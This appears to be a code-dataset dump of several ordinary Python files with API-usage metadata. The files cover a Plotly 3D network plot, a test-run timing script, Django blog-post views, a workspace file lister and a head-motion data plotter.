"86", "api": [{"api_name": "proto.module", "line_number": 11, "usage_type": "call"}, {"api_name": "proto.Message", "line_number": 21, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 39, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 40, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 43, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 43, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 43, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 46, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 46, "usage_type": "name"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 48, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 48, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 48, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 51, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 53, "usage_type": "name"}, {"api_name": "proto.MapField", "line_number": 53, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 54, "usage_type": "attribute"}, {"api_name": "proto.STRING", "line_number": 55, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.OperatorDefinition", "line_number": 58, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 58, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 58, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.OperatorDefinition", "line_number": 61, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 61, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 63, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 64, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 69, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 104, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 105, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 108, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 108, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 108, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 109, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 111, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 111, "usage_type": "name"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 113, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 113, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 113, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 114, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 116, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 118, "usage_type": "name"}, {"api_name": "proto.MapField", "line_number": 118, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 119, "usage_type": "attribute"}, {"api_name": "proto.STRING", "line_number": 120, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.AnalysisDefinition", "line_number": 123, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 123, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 123, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 124, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.AnalysisDefinition", "line_number": 126, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 126, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 128, "usage_type": "name"}, {"api_name": "proto.MapField", "line_number": 128, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 129, "usage_type": "attribute"}, {"api_name": "proto.STRING", "line_number": 130, "usage_type": "attribute"}, {"api_name": "typing.MutableMapping", "line_number": 133, "usage_type": "name"}, {"api_name": "proto.MapField", "line_number": 133, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 134, "usage_type": "attribute"}, {"api_name": "proto.STRING", "line_number": 135, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 138, "usage_type": "call"}, {"api_name": "proto.BOOL", "line_number": 139, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 144, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 180, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 181, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 184, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 184, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 184, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 185, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 187, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 187, "usage_type": "name"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 189, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 189, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 189, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 190, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 192, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 192, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 194, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 195, "usage_type": "attribute"}, {"api_name": "typing.MutableSequence", "line_number": 198, "usage_type": "name"}, {"api_name": "proto.RepeatedField", "line_number": 198, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 199, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.RunStatus", "line_number": 202, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 202, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 202, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 203, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.RunStatus", "line_number": 205, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 205, "usage_type": "name"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.RunMode", "line_number": 207, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 207, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 207, "usage_type": "call"}, {"api_name": "proto.ENUM", "line_number": 208, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.RunMode", "line_number": 210, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 210, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 212, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 213, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 216, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 217, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 220, "usage_type": "call"}, {"api_name": "proto.INT32", "line_number": 221, "usage_type": "attribute"}]} +{"seq_id": "29939072776", "text": "# $ sudo apt install build-essential python-dev libxml2 libxml2-dev zlib1g-dev\n# $ pip install python-igraph \n\nimport igraph as ig\nimport json\nimport requests\n\n# Import the Json\ndata = []\nr = requests.get(url='https://raw.githubusercontent.com/plotly/datasets/master/miserables.json')\nprint(r.json())\ndata = r.json()\nprint(data.keys())\n\n# Get the Number of Nodes\nN=len(data['nodes'])\nN\n\n# Define the list of edges and the Graph object from Edges:\nL=len(data['links'])\nEdges=[(data['links'][k]['source'], data['links'][k]['target']) for k in range(L)]\n\nG=ig.Graph(Edges, directed=False)\n\n# Extract the node attributes, 'group', and 'name':\ndata['nodes'][0]\nlabels=[]\ngroup=[]\nfor node in data['nodes']:\n labels.append(node['name'])\n group.append(node['group'])\n\n# Get the node positions, set by the Kamada-Kawai layout for 3D graphs:\nlayt=G.layout('kk', dim=3)\n\n# layt is a list of three elements lists (the coordinates of nodes):\nlayt[5]\n\n# Set data for the Plotly plot of the graph:\n\n\nXn=[layt[k][0] for k in range(N)]# x-coordinates of nodes\nYn=[layt[k][1] for k in range(N)]# y-coordinates\nZn=[layt[k][2] for k in range(N)]# z-coordinates\nXe=[]\nYe=[]\nZe=[]\nfor e in Edges:\n Xe+=[layt[e[0]][0],layt[e[1]][0], None]# x-coordinates of edge ends\n Ye+=[layt[e[0]][1],layt[e[1]][1], None]\n Ze+=[layt[e[0]][2],layt[e[1]][2], None]\n\n\n\n\nimport chart_studio.plotly as py\nimport plotly.graph_objs as go\n\ntrace1=go.Scatter3d(x=Xe,\n y=Ye,\n z=Ze,\n mode='lines',\n line=dict(color='rgb(125,125,125)', width=1),\n hoverinfo='none'\n )\n\ntrace2=go.Scatter3d(x=Xn,\n y=Yn,\n z=Zn,\n mode='markers',\n name='actors',\n marker=dict(symbol='circle',\n size=6,\n color=group,\n colorscale='Viridis',\n line=dict(color='rgb(50,50,50)', width=0.5)\n ),\n text=labels,\n hoverinfo='text'\n )\n\naxis=dict(showbackground=False,\n showline=False,\n zeroline=False,\n showgrid=False,\n showticklabels=False,\n title=''\n )\n\nlayout = go.Layout(\n title=\"Network of coappearances of characters in Victor Hugo's novel
Les Miserables (3D visualization)\",\n width=1000,\n height=1000,\n showlegend=False,\n scene=dict(\n xaxis=dict(axis),\n yaxis=dict(axis),\n zaxis=dict(axis),\n ),\n margin=dict(\n t=100\n ),\n hovermode='closest',\n annotations=[\n dict(\n showarrow=False,\n text=\"Data source: [1] miserables.json\",\n xref='paper',\n yref='paper',\n x=0,\n y=0.1,\n xanchor='left',\n yanchor='bottom',\n font=dict(\n size=14\n )\n )\n ], )\n\n\n\n\n\ndata=[trace1, trace2]\nfig=go.Figure(data=data, layout=layout)\n\npy.iplot(fig, filename='Les-Miserables')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "RyanGreenup/DataSci", "sub_path": "Visual_Analytics/Assessment/the-marvel-universe-social-network/plotly3dnetwork/online_exemplar.py", "file_name": "online_exemplar.py", "file_ext": "py", "file_size_in_byte": 3219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "igraph.Graph", "line_number": 23, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter3d", "line_number": 59, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 59, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter3d", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 67, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 90, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 90, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 125, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 125, "usage_type": "name"}, {"api_name": "chart_studio.plotly.iplot", "line_number": 127, "usage_type": "call"}, {"api_name": "chart_studio.plotly", "line_number": 127, "usage_type": "name"}]} +{"seq_id": "30781720722", "text": "import argparse\nimport datetime\nimport re \nimport glob\nimport json\nimport os\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Counts number of fields in testrun dirs')\n parser.add_argument('--testrun-dir', help='Directory to check', required=True)\n\n args = parser.parse_args()\n trial_dirs = glob.glob(args.testrun_dir + '/*')\n\n total_testing_time = datetime.timedelta()\n total_steps = 0\n for trial_dir in sorted(trial_dirs):\n if not os.path.isdir(trial_dir):\n continue\n print(trial_dir)\n\n # aggregate the total number of steps\n cr_files = glob.glob(trial_dir + '/mutated-*.yaml')\n total_steps += len(cr_files)\n\n # aggregate the total time\n # parse the duration\n with open(trial_dir + '/result.json', 'r') as result_file:\n result = json.load(result_file)\n duration_str = result['duration']\n duration = datetime.datetime.strptime(duration_str, '%H:%M:%S')\n duration_delta = datetime.timedelta(hours=duration.hour, minutes=duration.minute, seconds=duration.second)\n total_testing_time += duration_delta\n \n print('Total time: %s' % str(total_testing_time))\n\n with open(args.testrun_dir + '/test.log', 'r') as test_log:\n lines = test_log.readlines()\n\n timestamp_sequence = []\n log_regex = r'^\\s*'\n log_regex += r'(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2},\\d{3})'\n log_regex += r'\\s*'\n\n for line in lines:\n match = re.search(log_regex, line)\n if match:\n timestamp_sequence.append(match.group(1))\n\n start_timestamp = datetime.datetime.strptime(timestamp_sequence[0], '%Y-%m-%d %H:%M:%S,%f')\n end_timestamp = datetime.datetime.strptime(timestamp_sequence[-1], '%Y-%m-%d %H:%M:%S,%f')\n total_time = end_timestamp - start_timestamp\n print('Total time: %s' % str(total_time))\n", "repo_name": "xlab-uiuc/acto", "sub_path": "scripts/collect_time.py", "file_name": "collect_time.py", "file_ext": "py", "file_size_in_byte": 1946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 23, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 23, "usage_type": "call"}, {"api_name": "json.load", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 32, "usage_type": "call"}, {"api_name": "re.search", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "6981052644", "text": "from django.shortcuts import render,redirect,reverse\nfrom django.http import HttpResponse\nfrom .forms import post_create_form,comments_to_post_form,EditPostForm\nfrom django.shortcuts import get_object_or_404\nfrom .models import Posts\nfrom django.views.generic import ListView\nfrom django.contrib.auth.decorators import login_required\n\n\ndef edit_posts(reqeust,id):\n object = get_object_or_404(Posts , pk=id)\n if reqeust.user == object.author:\n form = EditPostForm(instance=object)\n if reqeust.method==\"POST\":\n form = EditPostForm(reqeust.POST , instance=object)\n if form.is_valid():\n form.save()\n return redirect(reverse('success'))\n context = {'form':form}\n return render(reqeust,'posts/editpost.html',context)\n else:\n return HttpResponse('you can not edit posts that are not yours')\n\n\n\ndef delete_posts(reqeust,id):\n object = get_object_or_404(Posts , pk=id)\n if reqeust.user == object.author:\n if reqeust.method==\"POST\":\n object.delete()\n return redirect(reverse('success'))\n return render(reqeust,'posts/deleteposts.html')\n else:\n return HttpResponse('you can not edit posts that are not yours')\n \ndef postslistview(request):\n posts = Posts.objects.all()\n context={'posts':posts}\n return render(request , 'posts/posts_list.html' , context)\n\n\n\n\n@login_required(redirect_field_name='/users/login')\ndef post_details_view(request , id):\n post = get_object_or_404(Posts , id=id)\n comments = Posts.objects.get(id=id).comments_set.all()\n context = {'post': post , 'comments':comments}\n return render(request ,'posts/post_details.html',context)\n\n\n\n\n\n@login_required(redirect_field_name='/users/login')\ndef create_post_view(request):\n if request.method =='POST':\n form= post_create_form(request.POST)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.author = request.user\n instance.save()\n return redirect(reverse('success'))\n else:\n form = post_create_form()\n\n context = {'form':form}\n\n return render(request , 'posts/post_create_form.html' ,context)\n\n@login_required(redirect_field_name='/users/login')\ndef comment_to_post_view(request,id):\n post = get_object_or_404(Posts,id =id)\n if request.method=='POST':\n form= comments_to_post_form(request.POST)\n if form.is_valid():\n instance=form.save(commit=False)\n instance.related_post=post\n instance.related_user=request.user\n instance.save()\n return redirect(reverse('success'))\n else:\n form = comments_to_post_form()\n\n post_id = post.id\n\n return render(request , 'posts/comments.html',context={'form':form,'post_id':post_id})\n\ndef search_view(request):\n if request.method=='GET':\n print(request.GET['searchino'])\n objects = Posts.objects.filter(title__icontains=request.GET['searchino'])\n print(objects)\n context = {'objects':objects }\n return render(request,'posts/search_results.html' , context)\n\n\n\n\n# Create your views here.\n", "repo_name": "hatem8311/Physics-Room-WebApplication-Django-2.2", "sub_path": "posts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3167, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Posts", "line_number": 11, "usage_type": "argument"}, {"api_name": "forms.EditPostForm", "line_number": 13, "usage_type": "call"}, {"api_name": "forms.EditPostForm", "line_number": 15, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Posts", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Posts.objects.all", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Posts.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Posts", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Posts", "line_number": 46, "usage_type": "argument"}, {"api_name": "models.Posts.objects.get", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Posts.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Posts", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 44, "usage_type": "call"}, {"api_name": "forms.post_create_form", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 63, "usage_type": "call"}, {"api_name": "forms.post_create_form", "line_number": 65, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Posts", "line_number": 73, "usage_type": "argument"}, {"api_name": "forms.comments_to_post_form", "line_number": 75, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 81, "usage_type": "call"}, {"api_name": "forms.comments_to_post_form", "line_number": 83, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 87, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 71, "usage_type": "call"}, {"api_name": "models.Posts.objects.filter", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Posts.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "models.Posts", "line_number": 92, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "3861825534", "text": "import pathspec\n\nfrom os import walk, path\nimport os\nimport codecs\nfrom pathlib import Path\n\n\nclass Dir:\n @classmethod\n def entries(cls, path):\n return os.listdir(path)\n\n\nclass Workspace:\n class MissingFile(Exception):\n pass\n\n class NoPermission(Exception):\n pass\n\n IGNORE = [\".\", \"..\", \".git\"]\n\n SPEC = pathspec.PathSpec(map(pathspec.patterns.GitWildMatchPattern, IGNORE))\n\n def __init__(self, pathname):\n self.pathname = pathname\n\n def list_files(self, pathname=None):\n\n blacklist_predicate = lambda f: not Workspace.SPEC.match_file(f)\n\n path = pathname or self.pathname\n\n if os.path.isdir(path):\n paths = []\n for (root, dirnames, filenames) in walk(path):\n fs = list(map(lambda path: os.path.join(root, path), filenames))\n filtered_fs = list(filter(blacklist_predicate, fs))\n paths.extend(filtered_fs)\n return paths\n elif os.path.exists(path):\n return [path]\n\n else:\n raise (Workspace.MissingFile(\"pathspec %s did not match any files\" % path))\n\n def read_file(self, path):\n try:\n f = codecs.open(os.path.join(self.pathname, path), \"r\", \"latin-1\")\n return f.read()\n except PermissionError:\n raise Workspace.NoPermission(\"open('%s'): Permission Denied\" % path)\n\n def stat_file(self, path):\n try:\n return os.stat(os.path.join(self.pathname, path))\n except PermissionError:\n raise Workspace.NoPermission(\"stat('%s'): Permission Denied\" % path)\n", "repo_name": "mattmarcello/pit", "sub_path": "lib/workspace.py", "file_name": "workspace.py", "file_ext": "py", "file_size_in_byte": 1619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "argument"}, {"api_name": "pathspec.PathSpec", "line_number": 24, "usage_type": "call"}, {"api_name": "pathspec.patterns", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 33, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "argument"}, {"api_name": "os.walk", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 43, "usage_type": "name"}, {"api_name": "os.path", "line_number": 46, "usage_type": "name"}, {"api_name": "codecs.open", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 53, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "24003585091", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 13 09:56:26 2019\n\n@author: sanjeev\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\nimport pandas as pd\nfrom sklearn.preprocessing import normalize\n\nFACTORS = [\"Head-RR\",\n \"Head-LL\",\n \"Head-CL\",\n \"Head-CR\",\n \"Nose-Down\",\n \"Nose-Up\",]\n\nDIMENSIONS = [\"X\",\n \"Y\",\n \"Z\",]\n\ndf = pd.read_csv(\"/Users/sanjeev/Documents/Projects/ProjectAssistant/HeadMotionData/Kannada/PavanIn/TrainingData/2016-05-28_16-17-34_PavanIn_Story1En.csv\")\ndf = df.loc[1:,:]\n\nfor f in FACTORS:\n diff_2 = []\n for d in DIMENSIONS:\n diff_2.append((df[f + \"-\" + d] - df[f + \"-\" + d].shift(1)) ** 2)\n df[f] = np.sum(np.array(diff_2).T, axis = 1)\n #df[f] = df[f] / np.nanmax(df[f])\n\ndf[\"word_location\"] = df[\"batch_start_time\"] + (df[\"word_start_time\"] + df[\"word_end_time\"]) / 2\n\nFACTORS.extend([\"interpolated_values_pitch\", \"interpolated_values_intensity\"])\nfor i in FACTORS:#df.columns[df.dtypes == 'float64']:\n df[i] = (df[i] - np.nanmin(df[i])) / (np.nanmax(df[i]) - np.nanmin(df[i]))\n \nfig, ax = plt.subplots(nrows = 1, squeeze = True, sharex = True, sharey = True)\n#plt.subplots_adjust(bottom=0.25)\n\nt = df[\"Time\"]#np.arange(0.0, 100.0, 0.05)\n\nfor n, f in enumerate(FACTORS):\n ax.plot(t, df[f] + n) \n \nax.plot(t, df[\"interpolated_values_pitch\"] + 6)\nax.plot(t, df[\"interpolated_values_intensity\"] + 7)\n#s = 100 * np.sin(2*np.pi*t)\n#l, = ax[1].plot(t,s)\nplt.axis([20, 30, 0, 8])\n\naxcolor = 'lightgoldenrodyellow'\naxpos = plt.axes([0.2, 0.05, 0.65, 0.03], facecolor=axcolor)\n\nsposx = Slider(axpos, 'Pos - X', 0, 300, valstep = 1)\n\ndef update(val):\n posx = sposx.val\n ax.axis([posx,posx+ 10, 0,8])#posy,posy + 0.1])\n fig.canvas.draw_idle()\n\nsposx.on_changed(update)\nsposy.on_changed(update)\n\nfor i in pd.DataFrame(sorted(filter(lambda x : np.isnan(x[1]) == False, zip(df[\"Time\"], df[\"sentences\"])), key = lambda x: x[0]), columns = [\"Time\", \"col\"]).groupby(\"col\").max()[\"Time\"]:\n ax.axvline(x = i, ls = '-', color = 'red', linewidth = 3.0)\n\nfor i in pd.DataFrame(sorted(filter(lambda x : np.isnan(x[1]) == False, zip(df[\"Time\"], df[\"sentences\"])), key = lambda x: x[0]), columns = [\"Time\", \"col\"]).groupby(\"col\").min()[\"Time\"]:\n ax.axvline(x = i, ls = '--', color = 'red', linewidth = 3.0) \n \nword_end_points = []\nword_start_points = []\nwords = []\nfor i, j in pd.DataFrame(sorted(filter(lambda x : np.isnan(x[1]) == False, zip(df[\"Time\"], df[\"word_location\"], df[\"sentences\"], df[\"word\"])), key = lambda x: x[0]), columns = [\"Time\", \"col\", \"sentences\", \"word\"]).groupby([\"col\"]):\n max_sen = max(j[\"sentences\"])\n ts = j[\"Time\"][j[\"sentences\"] == max_sen]\n word_end_points.append(max(ts))\n word_start_points.append(min(ts))\n words.append(j[\"word\"].values[0])\n \nfor i, j in zip(word_start_points, word_end_points):\n ax.axvline(x = i, ls = '--', color = 'green')\n ax.axvline(x = j, ls = '-', color = 'green')\n\nfor n, i in enumerate(zip(words, word_start_points, word_end_points)):\n#for i in set(zip(df[\"word\"],df[\"word_start_time\"], df[\"word_end_time\"], df[\"batch_start_time\"])):\n ax.text(x = (i[1] + i[2]) / 2, y = n % 8 + 0.5, s = i[0])\nplt.show()\n#pd.DataFrame(sorted(filter(lambda x : np.isnan(x[1]) == False, zip(df[\"Time\"], df[\"word_location\"])), key = lambda x: x[0]), columns = [\"Time\", \"col\"]).groupby(\"col\").max()\n\n", "repo_name": "SanjeevKV/gesturesynthesis", "sub_path": "PythonScripts/Plotter.py", "file_name": "Plotter.py", "file_ext": "py", "file_size_in_byte": 3462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.widgets.Slider", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 92, "usage_type": "call"}, 